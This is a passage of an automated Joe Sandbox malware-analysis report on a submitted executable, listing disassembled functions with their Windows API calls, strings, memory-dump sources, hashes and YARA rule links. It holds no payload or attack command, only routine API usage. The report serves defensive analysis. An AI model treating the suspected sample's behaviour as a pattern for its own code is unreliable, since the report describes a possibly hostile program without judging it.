API String ID: 4150878124-2766056989
Opcode ID: 203edce84ac462af17f658870b4c62151b68c1128baab23be6c809a7ee74368e
Instruction ID: 467aeff3bd1743c5067e7bbf4f55d3b3a629e9c8c71e1e2cd2a33d9d48ffd90d
Opcode Fuzzy Hash: 203edce84ac462af17f658870b4c62151b68c1128baab23be6c809a7ee74368e
Instruction Fuzzy Hash: 15413A72910218BFDB10EFA4DC81AEEB7B8AF09700F104095FE85B7181DA716E99CF61

Function 0028A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002BDC00,00000000,?,?,?,?), ref: 0028A6D8
GetWindowLongW.USER32 ref: 0028A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0028A705

Strings

SysTreeView32, xrefs: 0028A6AA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 8b41d09139eda96c0d39ea0c46b88477a3e35258018cc42c81643c736240bd79
Instruction ID: 674f9eb8c555140e011a68fccb660e8474ef7d4d848d3709435a34541592ed8d
Opcode Fuzzy Hash: 8b41d09139eda96c0d39ea0c46b88477a3e35258018cc42c81643c736240bd79
Instruction Fuzzy Hash: 9A31E335121206AFEF119F38DC45BDA77A9FB49324F144326F975931E1DB70AC609B50

Function 00275180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00275190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002751C6

Strings

|, xrefs: 002751B5
D', xrefs: 0027522E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D'
API String ID: 1413715105-966098666
Opcode ID: 330a25ead79fe686eef366ca111b13991c81f0ddbb7ee7a9509b1ffdc90cf3bc
Instruction ID: 8762477615eda59837594dabff4005e7b641771571cb176e5619ae38d0f13761
Opcode Fuzzy Hash: 330a25ead79fe686eef366ca111b13991c81f0ddbb7ee7a9509b1ffdc90cf3bc
Instruction Fuzzy Hash: 66314871810129EBCF11EFE0DC85AEEBFB8FF14710F104115E905A6166DA716965CF60

Function 0028A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0028A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0028A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0028A196

Strings

SysMonthCal32, xrefs: 0028A129

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 0d8458840b4e8143376d5eecbcd647d4ab9861450425bff91b354f3beef0a12e
Instruction ID: 2c77d875ce23e473224dcfc6fac080489aee54e4c1d352a84735634376bf622f
Opcode Fuzzy Hash: 0d8458840b4e8143376d5eecbcd647d4ab9861450425bff91b354f3beef0a12e
Instruction Fuzzy Hash: 0121D332520219ABEF119F94DC86FEA3B79EF48714F110115FE596B1D0DAB5AC60CBA0

Function 0028A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0028A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0028A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0028A956

Strings

msctls_updown32, xrefs: 0028A8BB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 9fa4d22177f2bb569185510be5fae69939124a768ce0c05033695f551fdc2627
Instruction ID: 601763093e2fab557d0e01551be4201b5a456bbf26383633f95555c04e01922b
Opcode Fuzzy Hash: 9fa4d22177f2bb569185510be5fae69939124a768ce0c05033695f551fdc2627
Instruction Fuzzy Hash: 2E2192B962020AAFEB10EF58DCC5D6737ADEF5A354B05005AFA059B291CB70EC21CB61

Function 002899A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00289A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00289A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00289A65

Strings

Listbox, xrefs: 002899FD

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 3ec087c4f6a2ec976e597acf8f9c6d69792c2300d0249714766ac043b4e1289c
Instruction ID: fab10478d15b058f892cbccdb878d1ebda9c2feb36dbad37f705279cd7e51a2c
Opcode Fuzzy Hash: 3ec087c4f6a2ec976e597acf8f9c6d69792c2300d0249714766ac043b4e1289c
Instruction Fuzzy Hash: 3921F532621119BFDF159F54DC85EBF3BAEEF8A750F058128F9445B1D0CA71AC618BA0

Function 0028A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0028A46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0028A482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0028A48F

Strings

msctls_trackbar32, xrefs: 0028A444

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d6933aa452a7f38213895b6fd5c28eb54a68aab4d8924e34ad227e2a2430f27c
Instruction ID: b9f08fe00296fcc457756a4db6e11fd6ce5d0f780975bea1ce9f39bdac2f8bfb
Opcode Fuzzy Hash: d6933aa452a7f38213895b6fd5c28eb54a68aab4d8924e34ad227e2a2430f27c
Instruction Fuzzy Hash: C3110A75260209BFEF206F64DC49FAB376DFF89754F014119FA45A60D1D6B1E821DB20

Function 00266685 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002666AF
DeviceIoControl.KERNEL32(00000000,EMSETTEXT,?,0000000C,?,0000000C,?,00000000), ref: 002666EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002666F5

Strings

EMSETTEXT, xrefs: 002666D6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: EMSETTEXT
API String ID: 33631002-1828000075
Opcode ID: 19f59946c9271bb9c102c1841ebfe782473974aecddefb21e7170d5d14febdd1
Instruction ID: 766eaeb92397860eef157b0b51c1744032c6a44ef099627bf73d1a6673357cc0
Opcode Fuzzy Hash: 19f59946c9271bb9c102c1841ebfe782473974aecddefb21e7170d5d14febdd1
Instruction Fuzzy Hash: F011C8B1910229BFE7118BA8DC49FAFB7BCEB05714F004555F905E7191C2B49E4487E5

Function 00242287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00242350,?), ref: 002422A1
GetProcAddress.KERNEL32(00000000), ref: 002422A8

Strings

combase.dll, xrefs: 0024229C
RoInitialize, xrefs: 00242290

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: 3c0f0b735d505ef019a48a3cec0cb0649ab385dfc3c610c0d65948ceab314acf
Instruction ID: 4351cc5577ec75a44531d7846c6391003b653fdac6d3390f0108d5b360d3426e
Opcode Fuzzy Hash: 3c0f0b735d505ef019a48a3cec0cb0649ab385dfc3c610c0d65948ceab314acf
Instruction Fuzzy Hash: 38E01270AA0341ABDF209F71FCCEB193A64AB02B02F504020F50ADE0A0DFF84896CF08

Function 0024235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00242276), ref: 00242376
GetProcAddress.KERNEL32(00000000), ref: 0024237D

Strings

combase.dll, xrefs: 00242371
RoUninitialize, xrefs: 00242365

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: f1b5761c99167e8e914b3f1d82b63e4f2ea4a65d36516f2c6ce18ff92dd07ba2
Instruction ID: 1c5c1421fde1ab6df64f0abf5fddac64bb733689a80185b182070c8cac068694
Opcode Fuzzy Hash: f1b5761c99167e8e914b3f1d82b63e4f2ea4a65d36516f2c6ce18ff92dd07ba2
Instruction Fuzzy Hash: 72E0B670695341EBDB205FA1FD8EB043A65B706702F100455F50EEE4B0CBF858A5CA14

Function 0029AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0029AC60
__swprintf.LIBCMT ref: 0029AC94

Strings

WIN_XPe, xrefs: 0029ACD3
%.3d, xrefs: 0029AC6E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: d370e9854527b527c66f653a721753da7a5583a66423328ab812c8f646b466e7
Instruction ID: 928bc529789dd3ff0999560e9501ee11737121c5fd1cf1763c357f9f3e1c185d
Opcode Fuzzy Hash: d370e9854527b527c66f653a721753da7a5583a66423328ab812c8f646b466e7
Instruction Fuzzy Hash: 28E012B1834718DBCF149750DD09DF9737CAB04741F100493B946A5110D7759BB4EA52

Function 00282205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,002821FB,?,002823EF), ref: 00282213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00282225

Strings

GetProcessId, xrefs: 0028221F
kernel32.dll, xrefs: 0028220E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 3130f680c35bf50ac32b6d8613c8c1fa38309cead204683dd5cb3f30ed4cd4fe
Instruction ID: 97dd54bb350f23090fa101770ae11fc8d9e5c48bf96ddec5cb216445069bfec4
Opcode Fuzzy Hash: 3130f680c35bf50ac32b6d8613c8c1fa38309cead204683dd5cb3f30ed4cd4fe
Instruction Fuzzy Hash: A2D0A738420713DFC7216F70F80C601B7D4EF17300B00841AEC4AE2694DB70DC948750

Function 002242F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,002242EC,?,002242AA,?), ref: 00224304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00224316

Strings

kernel32.dll, xrefs: 002242FF
Wow64RevertWow64FsRedirection, xrefs: 00224310

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: e5b147d164d13a1eea64a74720b4bc0a8788f15700e1e08a51c79c2a4f071a1b
Instruction ID: f11a095350275b76df04edda15ffbf13edc0a7c18ed36a91e1e53d87a3f16c15
Opcode Fuzzy Hash: e5b147d164d13a1eea64a74720b4bc0a8788f15700e1e08a51c79c2a4f071a1b
Instruction Fuzzy Hash: 08D0A730460723AFC7209FA0F80C64577D4AF16301B10845AE44BD2670DBB0CC908610

Function 0022434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,002241BB,00224341,?,0022422F,?,002241BB,?,?,?,?,002239FE,?,00000001), ref: 00224359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0022436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00224365
kernel32.dll, xrefs: 00224354

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: d843f14c5e88291b3a794951b533ca51423d77799ccab813c2109bbce14c68b1
Instruction ID: bafed4d9878b2d900f65a623c19b5dafc59b802d7558280b8ca5186309d0e088
Opcode Fuzzy Hash: d843f14c5e88291b3a794951b533ca51423d77799ccab813c2109bbce14c68b1
Instruction Fuzzy Hash: E1D0A730860723AFC7209FB0F80CA8177D4AF22725B10855AE486D2650DBB0DC908610

Function 00260539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0026051D,?,002605FE), ref: 00260547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00260559

Strings

RegisterTypeLibForUser, xrefs: 00260553
oleaut32.dll, xrefs: 00260542

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 6e71d7834024152275e443f1d8c60299e502ca9e37e0416fb2743faae3d2a376
Instruction ID: 3285bd62686414ba0b65ed6261bc3add9c49bbbe9c236df613d19cdc2c6b04db
Opcode Fuzzy Hash: 6e71d7834024152275e443f1d8c60299e502ca9e37e0416fb2743faae3d2a376
Instruction Fuzzy Hash: FFD0C771574713DFD7209FA5F84C64676E4BB16711B60C81EE45BD2A60DA70CCD48A50

Function 00260564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0026052F,?,002606D7), ref: 00260572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00260584

Strings

UnRegisterTypeLibForUser, xrefs: 0026057E
oleaut32.dll, xrefs: 0026056D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 51ebc39b91ab86f7e83293710ac417dbf3426ef9f50b2a8292489335bfb70d07
Instruction ID: 5c897f3b27697bfe191c66b4909fc029d0bbc4c9a6d26373d054c592ca236738
Opcode Fuzzy Hash: 51ebc39b91ab86f7e83293710ac417dbf3426ef9f50b2a8292489335bfb70d07
Instruction Fuzzy Hash: 70D05E304203229FC7205F60A848A0277E4AB16300B50881BE84692A50DA70C8D48A20

Function 0027ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0027ECBE,?,0027EBBB), ref: 0027ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0027ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0027ECE2
kernel32.dll, xrefs: 0027ECD1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: a99dbd0ce43060153d8a2b5dd76338c24e3597fa54ebf4253e98045ee81bc5e3
Instruction ID: b0697725251b9108e0f85a5116b648f915e8b15d6257299a3417746dd704693f
Opcode Fuzzy Hash: a99dbd0ce43060153d8a2b5dd76338c24e3597fa54ebf4253e98045ee81bc5e3
Instruction Fuzzy Hash: 5ED05E354207239FCB215F60A84860276E4AB07300B01C45FE84A92650DF70D8908A20

Function 0027BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0027BAD3,00000001,0027B6EE,?,002BDC00), ref: 0027BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0027BAFD

Strings

GetModuleHandleExW, xrefs: 0027BAF7
kernel32.dll, xrefs: 0027BAE6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 325dba040f92c8667a6214244b51f8751fba14f708fdeb2c435a154101e1c432
Instruction ID: 49a91d76cc02c05ed649b85675144d95ced422b76161e48d91778cbfa5f52675
Opcode Fuzzy Hash: 325dba040f92c8667a6214244b51f8751fba14f708fdeb2c435a154101e1c432
Instruction Fuzzy Hash: DAD05230A207139FC7316F60B848B1276E8AB0A305B00C42AEC8BD2650EBB0D890CA10

Function 00283BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00283BD1,?,00283E06), ref: 00283BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00283BFB

Strings

advapi32.dll, xrefs: 00283BE4
RegDeleteKeyExW, xrefs: 00283BF5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

